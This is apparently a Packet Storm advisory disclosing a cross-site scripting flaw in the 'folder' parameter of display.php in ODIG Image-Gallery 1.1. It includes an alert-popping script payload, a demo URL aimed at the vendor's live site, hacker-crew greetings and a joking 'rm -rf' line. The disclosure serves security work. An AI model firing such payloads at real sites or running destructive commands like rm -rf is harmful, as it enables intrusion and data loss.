Obsession-Design Image-Gallery (ODIG) suffers from a cross site scripting vulnerability in display.php.
67ebb825b3f2baa0bff6f60efc7d1cd3546e972ec40cb9271a3b660b03f4cbf3#############################################################################################################
## ODIG - Obsession-Design Image-Gallery Cross site scripting ( XSS ) ##
## Author : kaMtiEz (kamzcrew@yahoo.com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : 2 januari, 2010 ##
#############################################################################################################
[ Software Information ]
[+] Vendor : http://obsession-design.de/scripte/odig/
[+] Download : http://obsession-design.de/ch_counter/getfile.php?id=10
[+] version : 1.1
[+] Vulnerability : XSS
[+] Dork : syalalala
[+] LOCATION : INDONESIA - JOGJA
#############################################################################################################
[ Vulnerable File ]
http://127.0.0.1/[kaMtiEz]/odig/display.php?folder=[INDONESIANCODER]
[ EXPLOIT ]
/>"><script>alert(123456789)</script>
[ DEMO ]
http://obsession-design.de/demos/odig/display.php?folder=/>"><script>alert(123456789)</script>
[ FIX ]
dunno :">
#############################################################################################################
[ Thx TO ]
[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink
[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry ..
[+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk
[ NOTE ]
[+] Babe enyak adek i love u pull dah ..
[+] to someone u will be p0wned :P
[+] rm -rf
[ QUOTE ]
[+] we are stil r0x
[+] nothing secure ..
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed